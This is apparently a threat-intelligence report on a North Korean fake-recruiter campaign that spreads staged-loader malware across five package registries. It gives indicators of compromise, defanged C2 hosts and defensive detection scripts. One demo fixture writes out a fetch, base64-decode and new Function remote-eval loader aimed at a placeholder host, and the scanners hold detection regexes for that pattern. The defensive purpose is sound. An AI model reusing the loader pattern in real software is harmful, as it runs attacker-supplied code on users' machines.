Analysis
The Contagious Interview operation — a long-running North Korean campaign that sends fake recruiter messages to software developers and hands them a "technical test" that is actually malware — has crossed a threshold. A newly reported package cluster, first identified by Socket, spreads a coordinated set of staged loaders across npm, PyPI, Go Modules, crates.io, and Packagist simultaneously. Publishing to five ecosystems under coordinated GitHub aliases is not an accident of tooling. It is a deliberate coverage strategy: a developer who reaches one malicious package on one registry and quarantines it may install a sibling package on a second registry without knowing they're pulling from the same campaign infrastructure. The Windows build of one package in this cluster — license-utils-kit on PyPI — drops a full post-compromise toolkit including shell access, keylogging, browser credential extraction, and AnyDesk-based persistent remote access. The thin-loader stage has hands-on intrusion capability attached.
Background: what Contagious Interview is
Contagious Interview (also tracked as FriendlyFerret, CL-STA-0240, and loosely associated with the Lazarus Group's IT-worker sub-cluster) has been operating since at least 2023. The campaign's social-engineering vector is consistent: a North Korean operator poses as a recruiter on LinkedIn, GitHub, or freelance platforms; initiates a job interview; and at some point asks the developer to clone a repository and run code locally as part of a "technical assessment" or "coding challenge." The code is the malware.
The payload family has evolved across three generations:
- BeaverTail — a JavaScript-based infostealer typically delivered as a trojanized npm package or as a fake Electron app. Targets browser credential stores, crypto wallet files, SSH keys, and cloud credentials. Has been found masquerading as video conferencing utilities and coding environment helpers.
- InvisibleFerret — a Python-based backdoor deployed as BeaverTail's second stage. Provides command execution, file upload/download, keylogging, and clipboard capture. Persists via cron, LaunchAgent (macOS), or startup registry entries.
- OtterCookie — a newer JavaScript-based payload observed from late 2024 onward, delivered via npm packages. Establishes a Socket.IO-based C2 channel and uses a JSON Web Token shared secret for authentication. Designed for persistent command-and-control rather than one-time credential theft.
The 2026 cluster reported by Socket extends this pattern into four additional ecosystems (Go, Rust, PHP, PyPI) while maintaining npm as the JavaScript delivery surface. The multi-ecosystem reach is the operational evolution.
The 2026 cluster: packages and personas
Socket identified packages published under three coordinated GitHub aliases — golangorg, aokisasakidev, and aokisasakidev1 — with a fourth alias (maxcointech1010) used for a GitHub account populated with cloned repositories across AI, blockchain, and developer tooling themes. The cloned repositories appear designed to lend the alias credibility rather than to publish packages directly.
npm:
- dev-log-core
- pino-debugger
- debug-fmt
- debug-glitz
- logger-base — dormant/sleeper at time of analysis
- logkitx — dormant/sleeper at time of analysis
PyPI:
- logutilkit
- apachelicense
- fluxhttp
- license-utils-kit
Go Modules:
- github.com/golangorg/formstash
- github.com/aokisasakidev/mit-license-pkg
Rust (crates.io):
- logtrace
PHP (Packagist):
- golangorg/logkit
Payload mechanics
The Python, Go, Rust, and PHP branches share a common staged-loader workflow:
- Call out to attacker-controlled staging infrastructure to retrieve a payload URL.
- Convert any Google Drive share link to a direct-download URL.
- Pull a ZIP archive — typically named ecw_update.zip — and extract it into a hardcoded temporary directory named 410BB449A-72C6-4500-9765-ACD04JBV827V32V.
- Execute a platform-specific second-stage binary: systemd-resolved on Linux (name impersonates the systemd resolver), com.apple.systemevents on macOS (name impersonates an Apple process), and py.exe on Windows.
The trigger functions — log(), find_by_key(), trace(), CheckForUpdates() — are named to look like ordinary library behavior. Reviewers who skim the package's public API surface see plausible utility code. The malicious staging call is embedded in these methods.
The npm branch works differently. Rather than staging a ZIP to disk, dev-log-core sends a POST request to a remote endpoint, base64-decodes the response body, and executes it via new Function(require, decodedCode)(require). This technique — server-supplied arbitrary JavaScript evaluated inside the host Node.js process — has no local artifact to scan. No file is written before the payload executes. The entire second stage exists only in the HTTP response and in memory.
The new Function() eval pattern is designed to defeat local artifact scanning. The payload isn't in the package tarball; it's fetched fresh from the operator's server at execution time. This means a clean hash on the installed package is not evidence of safety — if the C2 server is live and returning a payload, the package is weaponized regardless of what the tarball contains.
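The loader shape described above (network fetch, base64 decode, dynamic code construction, no artifact on disk) is something a defender can look for statically in an installed package before its lifecycle hooks ever run. The following is an added example, not code from the Socket report or from the campaign: a small triage scanner that flags lifecycle hooks not on an allowlist and JavaScript files that combine all three token classes. The regexes are assumed signatures (tune them for your codebase), and the demo package it writes to a temp directory is constructed for illustration with a placeholder URL.

```python
"""
Added example (not from the Socket report or the campaign's own code): static
triage of one installed npm package directory. It flags lifecycle hooks that
are not allowlisted and JS files that combine a network call, a base64 decode
and dynamic code construction (new Function / eval) in one file.
"""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed token classes; their co-occurrence in one file is the fetch-decode-execute shape.
NETWORK_RE = re.compile(r"\b(fetch|https?\.request|axios|got)\s*\(|\.post\s*\(", re.I)
BASE64_RE = re.compile(r"Buffer\.from\(.*?['\"]base64['\"]\s*\)|\batob\s*\(")
DYNEXEC_RE = re.compile(r"\bnew\s+Function\s*\(|\beval\s*\(")


def scan_package_json(path, allowlist=frozenset()):
    """Return (hook, command) pairs declared by a package unless it is allowlisted."""
    with open(path, encoding="utf-8") as fh:
        pkg = json.load(fh)
    if pkg.get("name") in allowlist:
        return []
    scripts = pkg.get("scripts") or {}
    return [(hook, scripts[hook]) for hook in LIFECYCLE_HOOKS if hook in scripts]


def scan_js_source(text):
    """Return the set of suspicious token classes present in one JS source text."""
    hits = set()
    if NETWORK_RE.search(text):
        hits.add("network")
    if BASE64_RE.search(text):
        hits.add("base64")
    if DYNEXEC_RE.search(text):
        hits.add("dynamic-exec")
    return hits


def triage_package_dir(pkg_dir, allowlist=frozenset()):
    """Walk one package directory and return findings as (kind, detail) tuples."""
    findings = []
    manifest = os.path.join(pkg_dir, "package.json")
    if os.path.exists(manifest):
        for hook, cmd in scan_package_json(manifest, allowlist):
            findings.append(("lifecycle-hook", f"{hook}: {cmd}"))
    for root, _dirs, files in os.walk(pkg_dir):
        for name in sorted(files):
            if not name.endswith((".js", ".cjs", ".mjs")):
                continue
            full = os.path.join(root, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = scan_js_source(fh.read())
            rel = os.path.relpath(full, pkg_dir)
            # All three together is the remote-eval loader shape; dynamic exec alone is
            # a weaker signal worth a look but common in legitimate code.
            if {"network", "base64", "dynamic-exec"} <= hits:
                findings.append(("remote-eval-loader", rel))
            elif "dynamic-exec" in hits:
                findings.append(("dynamic-exec", rel))
    return findings


def build_demo_package():
    """Write a constructed demo package (not a real sample) and return its directory."""
    d = tempfile.mkdtemp(prefix="npm-triage-demo-")
    with open(os.path.join(d, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "demo-logger", "version": "0.0.1",
                   "scripts": {"postinstall": "node setup.js"}}, fh)
    # Fixture with only the *shape* of the loader: placeholder host, not runnable as CJS.
    with open(os.path.join(d, "setup.js"), "w", encoding="utf-8") as fh:
        fh.write("const r = await fetch('https://staging.example.invalid/p', {method: 'POST'});\n"
                 "const code = Buffer.from(await r.text(), 'base64').toString();\n"
                 "new Function('require', code)(require);\n")
    with open(os.path.join(d, "index.js"), "w", encoding="utf-8") as fh:
        fh.write("module.exports = { log: (m) => console.log(m) };\n")
    return d


if __name__ == "__main__":
    for kind, detail in triage_package_dir(build_demo_package()):
        print(f"{kind:20} {detail}")
```

Run it over each directory under node_modules after an install done with --ignore-scripts; a remote-eval-loader hit plus a postinstall hook on the same package is the combination to escalate, and an allowlisted package still gets its source scanned.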
license-utils-kit: the full-capability variant
license-utils-kit on PyPI stands apart from the rest of the cluster. On Linux and macOS it behaves as a standard staged loader (Google Drive staging, ecw_update.zip, platform binary). On Windows it bundles a substantially more capable implant:
- Shell access — remote command execution
- Keylogging — keystroke capture
- Browser credential and session extraction — targeting Chromium-family browsers
- Cryptocurrency wallet extraction — targeting common desktop wallet files
- File harvesting and encrypted exfiltration archives
- AnyDesk-based persistent remote access — leveraging the legitimate AnyDesk remote desktop client as a persistence and access mechanism to avoid triggering "unknown binary" defenses
- Separate C2 channel — direct connection to 66[.]45[.]225[.]94, bypassing the staging-infrastructure indirection used by other packages in the cluster
The Windows build effectively combines the BeaverTail credential-theft profile with an InvisibleFerret-style backdoor and AnyDesk-based remote-operator access into a single package. The social-engineering implication is significant: a Windows developer who installs this as part of a "technical assessment" hands the operator a persistent remote access session, not just a one-time credential dump.
Social-engineering vector
Contagious Interview's delivery mechanism is distinct from the supply-chain attacks documented in the TeamPCP and Shai-Hulud clusters. Those campaigns compromise existing trusted packages and wait for downstream consumers to install them passively. Contagious Interview recruits the victim: the developer is approached via LinkedIn or a freelance platform, cultivated over multiple messages, and eventually directed to clone a repository or install a package as part of an interview process.
This means the campaign specifically targets developers who are actively job-seeking or open to freelance work — a population that will accept unsolicited package-installation requests that a non-interview context would make suspicious. The technical-test framing normalizes running unfamiliar code locally. Developers who would never run npm install <unknown-package> in production may do exactly that when told it's a screening exercise from a recruiter.
Common recruitment signals associated with this campaign:
- Recruiter messages referencing AI, blockchain, fintech, or crypto projects — sectors that match the fake-repository themes used by maxcointech1010
- Requests to "run a quick test project" or "review this demo repo" as part of the interview process, especially if the request arrives on a timeline that discourages careful review
- GitHub profiles with many cloned or forked repositories across AI/crypto/ML themes but no meaningful commit history to any of them
- Contact originating from platforms where identity verification is weak (LinkedIn, GitHub, freelance marketplaces)
Indicators of compromise
Malicious packages (all ecosystems):
- npm: dev-log-core, pino-debugger, debug-fmt, debug-glitz, logger-base, logkitx
- PyPI: logutilkit, apachelicense, fluxhttp, license-utils-kit
- Go: github.com/golangorg/formstash, github.com/aokisasakidev/mit-license-pkg
- crates.io: logtrace
- Packagist: golangorg/logkit
Filesystem artifacts:
- ecw_update.zip in any temporary directory
- Directory named 410BB449A-72C6-4500-9765-ACD04JBV827V32V
- Files named start.py, systemd-resolved (in non-systemd paths), com.apple.systemevents (in non-Apple paths), or py.exe
- AnyDesk installed on a developer workstation that the user did not install
Network indicators (defanged):
- apachelicense[.]vercel[.]app
- ngrok-free[.]vercel[.]app
- logkit[.]onrender[.]com
- logkit-tau[.]vercel[.]app
- 66[.]45[.]225[.]94 — direct C2 IP (license-utils-kit Windows variant)
- Suspicious Google Drive direct-download patterns from non-browser processes
Behavioral signals:
- Outbound HTTP to Vercel or Render endpoints from a process spawned during npm install or pip install
- ZIP archive download and extraction into a randomized directory name during package install
- new Function() execution pattern in Node.js processes spawned by npm lifecycle hooks
- AnyDesk process running without corresponding user-initiated installation
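The filesystem, network and behavioral indicators above only become useful once they are matched against telemetry. The following is an added example, not part of the Socket report: it refangs the listed indicators and runs them, together with the behavioral heuristics, over endpoint events. The events are constructed and use a hypothetical JSON-lines schema (type, process, parent_cmd, dest, url, path, image, parent); a real EDR export will need a field-mapping step, and the "AnyDesk launched by an interpreter" rule and the canonical system-binary paths are assumptions to adjust per environment.

```python
"""
Added example, not from the Socket report: matching the listed indicators and
behavioral signals against constructed endpoint telemetry in a hypothetical
JSON-lines schema.
"""
import json
import re

DEFANGED_NETWORK = [
    "apachelicense[.]vercel[.]app",
    "ngrok-free[.]vercel[.]app",
    "logkit[.]onrender[.]com",
    "logkit-tau[.]vercel[.]app",
    "66[.]45[.]225[.]94",
]
STAGING_ZIP = "ecw_update.zip"
STAGING_DIR = "410BB449A-72C6-4500-9765-ACD04JBV827V32V"
# Impersonated binary names and the only directory prefix where the real one lives
# (assumed canonical locations; adjust for your distro/OS).
IMPERSONATED = {
    "systemd-resolved": "/usr/lib/systemd/",
    "com.apple.systemevents": "/system/library/",
}
INSTALLER_CMD = re.compile(r"\b(npm|pip3?|poetry|go|cargo|composer)\b.*\b(install|ci|get|add|require)\b")
HOSTED_STAGING = re.compile(r"\.(vercel\.app|onrender\.com)$")
BROWSERS = {"chrome", "chrome.exe", "firefox", "firefox.exe", "safari", "msedge.exe"}
# Heuristic (assumed): AnyDesk started by one of these parents was not a user install.
INTERPRETER_PARENTS = {"python.exe", "py.exe", "node.exe", "cmd.exe", "powershell.exe"}


def refang(ioc):
    """Turn a defanged indicator back into the literal value seen on the wire."""
    return ioc.replace("[.]", ".")


NETWORK_IOCS = {refang(x) for x in DEFANGED_NETWORK}


def check_event(ev):
    """Return the list of indicator names one event matches (empty if none)."""
    hits = []
    kind = ev.get("type")
    if kind == "net_connect":
        dest = ev.get("dest", "").lower()
        if dest in NETWORK_IOCS:
            hits.append("known-staging-or-c2")
        elif HOSTED_STAGING.search(dest) and INSTALLER_CMD.search(ev.get("parent_cmd", "")):
            hits.append("installer-spawned-outbound-to-vercel-render")
        if (dest == "drive.google.com" and "export=download" in ev.get("url", "")
                and ev.get("process", "").lower() not in BROWSERS):
            hits.append("drive-direct-download-from-non-browser")
    elif kind == "file_create":
        path = ev.get("path", "").replace("\\", "/")
        base = path.rsplit("/", 1)[-1].lower()
        if base == STAGING_ZIP:
            hits.append("staging-zip")
        if STAGING_DIR.lower() in path.lower():
            hits.append("hardcoded-extraction-dir")
        if base in IMPERSONATED and not path.lower().startswith(IMPERSONATED[base]):
            hits.append("impersonated-system-binary")
    elif kind == "process_start":
        image = ev.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
        if image == "anydesk.exe" and ev.get("parent", "").lower() in INTERPRETER_PARENTS:
            hits.append("anydesk-launched-by-interpreter")
    return hits


def scan_events(lines):
    """Parse JSON-lines telemetry and return [(line_no, indicator), ...]."""
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if line:
            findings.extend((n, hit) for hit in check_event(json.loads(line)))
    return findings


SAMPLE_EVENTS = [  # constructed for the demo, not captured telemetry
    '{"type":"net_connect","process":"python","parent_cmd":"pip install logutilkit","dest":"logkit.onrender.com"}',
    '{"type":"net_connect","process":"py.exe","parent_cmd":"","dest":"66.45.225.94"}',
    '{"type":"net_connect","process":"node","parent_cmd":"npm install","dest":"some-preview.vercel.app"}',
    '{"type":"net_connect","process":"chrome","parent_cmd":"","dest":"some-preview.vercel.app"}',
    '{"type":"net_connect","process":"python","url":"https://drive.google.com/uc?export=download&id=PLACEHOLDER","dest":"drive.google.com"}',
    '{"type":"file_create","path":"/tmp/ecw_update.zip"}',
    '{"type":"file_create","path":"/tmp/410BB449A-72C6-4500-9765-ACD04JBV827V32V/systemd-resolved"}',
    '{"type":"file_create","path":"/usr/lib/systemd/systemd-resolved"}',
    '{"type":"process_start","image":"C:\\\\Users\\\\dev\\\\AppData\\\\Local\\\\AnyDesk\\\\AnyDesk.exe","parent":"python.exe"}',
    '{"type":"process_start","image":"C:\\\\Program Files\\\\AnyDesk\\\\AnyDesk.exe","parent":"explorer.exe"}',
]

if __name__ == "__main__":
    for line_no, hit in scan_events(SAMPLE_EVENTS):
        print(f"line {line_no}: {hit}")
```

Exact-match indicators (the refanged hostnames and IP, the ZIP name, the extraction directory) are high confidence on their own; the Vercel/Render and Google Drive rules are scoped to installer-spawned or non-browser processes precisely because those hosts carry plenty of legitimate traffic.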
Detection and mitigation
- Audit all five ecosystems in your dependency trees. Check package.json / lockfiles, requirements.txt / poetry.lock, go.mod / go.sum, Cargo.toml / Cargo.lock, and composer.json for any of the listed package names. Recent build history matters — a package may have been removed from the current tree but was present in a prior build that ran on a CI runner.
- Treat any host that installed these packages as compromised. Rotate cloud credentials (AWS/Azure/GCP), GitHub tokens, npm and PyPI publish tokens, SSH keys, Kubernetes service account tokens, and any secrets in environment variables. The malware enumerates broadly; assume everything reachable from the host was exfiltrated.
- Search for filesystem artifacts listed above, particularly ecw_update.zip and the hardcoded extraction directory. The presence of either confirms payload execution.
- Block the listed C2 endpoints at the network perimeter. The direct IP 66[.]45[.]225[.]94 and the Vercel/Render staging domains are clean blocks that don't risk breaking legitimate traffic.
- Enable npm install script blocking by default in CI (npm ci --ignore-scripts). Allowlist packages that genuinely require lifecycle hooks. The dev-log-core postinstall path is blocked entirely by this flag.
- Educate developers on the recruitment vector. The social-engineering approach means developer awareness is a genuine control here — unusual for supply-chain attacks. A developer who knows to treat "run this test repo" as a red flag reduces the campaign's effective surface.
- Investigate unauthorized AnyDesk installations. On Windows, the presence of AnyDesk installed without user action on a developer workstation — especially one that recently ran a job-interview coding test — should be treated as evidence of active intrusion, not just initial compromise.
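The first mitigation step, auditing five manifest formats for the listed names, is tedious to do by hand across a monorepo. The following is an added example, not code from the Socket report or any of the affected registries: minimal parsers for package.json, requirements.txt, go.mod, Cargo.toml and composer.json, matched against the package list given in this analysis. The parsers read declared dependency names only (no version resolution, and Cargo inline-table renames are not followed), the PyPI normalization follows PEP 503, and the manifests it runs over are constructed for the demo.

```python
"""
Added example, not from the Socket report: audit the five manifest formats named
above for the package names listed in this analysis. Run it over lockfiles and
archived CI manifests too, since a package dropped from the current tree may
have been installed by an earlier build.
"""
import json
import re

MALICIOUS = {
    "npm": {"dev-log-core", "pino-debugger", "debug-fmt", "debug-glitz", "logger-base", "logkitx"},
    "pypi": {"logutilkit", "apachelicense", "fluxhttp", "license-utils-kit"},
    "go": {"github.com/golangorg/formstash", "github.com/aokisasakidev/mit-license-pkg"},
    "crates": {"logtrace"},
    "packagist": {"golangorg/logkit"},
}
CARGO_DEP_SECTIONS = ("dependencies", "dev-dependencies", "build-dependencies")


def parse_package_json(text):
    pkg = json.loads(text)
    keys = ("dependencies", "devDependencies", "optionalDependencies", "peerDependencies")
    return {name for key in keys for name in (pkg.get(key) or {})}


def normalize_pypi(name):
    # PEP 503: case-insensitive; runs of '-', '_' and '.' collapse to a single '-'.
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirements(text):
    names = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):  # options such as -r / -e / --index-url
            continue
        m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)  # name before any specifier
        if m:
            names.add(normalize_pypi(m.group(0)))
    return names


def parse_go_mod(text):
    names, in_block = set(), False
    for raw in text.splitlines():
        s = raw.split("//", 1)[0].strip()  # drop '// indirect' style comments
        parts = s.split()
        if s.startswith("require ("):
            in_block = True
        elif in_block and s == ")":
            in_block = False
        elif in_block and parts:
            names.add(parts[0])
        elif parts[:1] == ["require"] and len(parts) >= 3:  # single-line require
            names.add(parts[1])
    return names


def parse_cargo_toml(text):
    names, section = set(), None
    for raw in text.splitlines():
        s = raw.split("#", 1)[0].strip()
        if s.startswith("[") and s.endswith("]"):
            section = s[1:-1]
            head, _, tail = section.partition(".")
            if head in CARGO_DEP_SECTIONS and tail:  # [dependencies.name] table form
                names.add(tail.strip('"'))
            continue
        if section in CARGO_DEP_SECTIONS and "=" in s:
            names.add(s.split("=", 1)[0].strip().strip('"'))
    return names


def parse_composer_json(text):
    pkg = json.loads(text)
    deps = {n for key in ("require", "require-dev") for n in (pkg.get(key) or {})}
    return {n for n in deps if n != "php" and not n.startswith("ext-")}  # platform pseudo-packages


PARSERS = {
    "package.json": ("npm", parse_package_json),
    "requirements.txt": ("pypi", parse_requirements),
    "go.mod": ("go", parse_go_mod),
    "Cargo.toml": ("crates", parse_cargo_toml),
    "composer.json": ("packagist", parse_composer_json),
}


def audit(manifests):
    """manifests: {path: text}. Returns sorted [(ecosystem, path, package_name)]."""
    findings = []
    for path, text in manifests.items():
        base = path.replace("\\", "/").rsplit("/", 1)[-1]
        if base in PARSERS:
            eco, parser = PARSERS[base]
            findings.extend((eco, path, name) for name in parser(text) & MALICIOUS[eco])
    return sorted(findings)


SAMPLE_MANIFESTS = {  # constructed for the demo
    "web/package.json": '{"dependencies": {"express": "^4.19.0", "logger-base": "1.0.2"}}',
    "svc/requirements.txt": "requests==2.31.0\nLicense_Utils_Kit>=1.0  # added for the 'test'\nfluxhttp ; python_version < '3.12'\n",
    "tool/go.mod": "module example.test/tool\n\ngo 1.22\n\nrequire (\n\tgithub.com/golangorg/formstash v0.1.0\n\tgolang.org/x/text v0.14.0 // indirect\n)\n",
    "agent/Cargo.toml": '[package]\nname = "agent"\n\n[dependencies]\nserde = "1"\nlogtrace = "0.3"\n',
    "site/composer.json": '{"require": {"php": ">=8.1", "monolog/monolog": "^3.0", "golangorg/logkit": "*"}}',
}

if __name__ == "__main__":
    for eco, path, name in audit(SAMPLE_MANIFESTS):
        print(f"[{eco}] {path}: {name}")
```

Feed it the output of a repository walk (or of git show on historical commits) rather than only the working tree, and pair a hit with the host-level artifact checks: a listed name in a manifest shows exposure, the ZIP or extraction directory shows execution.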
Attribution
Socket attributes this cluster to North Korea's Contagious Interview operation based on TTP continuity: the staged Google Drive loader pattern, the BeaverTail/InvisibleFerret toolchain, the AI/crypto/developer-tooling cover personas, and the social-engineering recruitment vector. These are consistent with activity CrowdStrike tracks as Famous Chollima, Mandiant tracks under UNC4736/UNC2970, and the broader Lazarus Group IT-worker umbrella. The multi-ecosystem reach represents a tactical evolution but not a change in underlying infrastructure or targeting logic.
Attribution to North Korea in this context is well-supported: FBI and CISA have issued multiple advisories attributing Contagious Interview to DPRK-affiliated IT workers. The operational goal is currency generation — stolen credentials and persistent access convert into cryptocurrency theft and market manipulation. Developer workstations and CI/CD runners are the preferred targets because they hold both the credentials to access financial platforms and the ability to push code to production.
Criminal-market signal
Dark-web sweeps run on May 6, 2026 found no criminal-market presence for this campaign on publicly-observable venues.
The absence is structural, not circumstantial. Contagious Interview is a North Korean state operation with a specific monetization model: stolen credentials and persistent access feed DPRK's cryptocurrency theft program directly. The attack tooling — BeaverTail, InvisibleFerret, OtterCookie — is not a product. There is no market because there is no seller. The credentials go to the state; the capability stays internal. This pattern holds across every documented DPRK cyber operation and is unlikely to change regardless of how many sweeps are run or how much time passes.
Criminal-market monitoring provides no early warning for this campaign class. The social-engineering recruitment vector — fake recruiter, coding interview, install this repo — is the detection surface. Awareness training that specifically covers the fake-recruiter pattern is a required complement to any technical control, because the developer may intentionally install the malicious package believing it is a legitimate interview task.
What distinguishes this from the TeamPCP cluster
Both Contagious Interview and TeamPCP are active supply-chain campaigns operating in 2026 with overlapping technical tactics (staged loaders, credential theft, multi-ecosystem publishing). The meaningful distinctions for defenders:
- Initial access vector: TeamPCP compromises existing trusted packages via stolen CI/CD credentials, relying on passive installation by downstream consumers. Contagious Interview deploys fresh packages and actively recruits the first victim via social engineering. TeamPCP's blast radius is larger (2M-download packages); Contagious Interview's targeting is more intentional (developers in AI/crypto/fintech).
- Operator motivation: TeamPCP exfiltrates credentials and may sell or reuse them. Contagious Interview exfiltrates credentials and converts them directly to cryptocurrency theft — a state-level monetization operation, not a criminal market vendor.
- Persistence model: TeamPCP payloads are designed for quick credential sweep and worm propagation. The license-utils-kit Windows build is designed for sustained hands-on access via AnyDesk. The DPRK campaign expects to sit inside developer environments for extended periods.
Defenders who monitor supply-chain registries for postinstall hooks and unexpected dependencies will catch both campaigns at the package level. But Contagious Interview's social-engineering entry point means the malicious package installation may be intended by the developer — standard SCA alerting on an unknown package may be dismissed as a false positive if the developer believes they're running a legitimate interview test. Awareness training that specifically covers the fake-recruiter pattern is a required complement to technical controls for this campaign.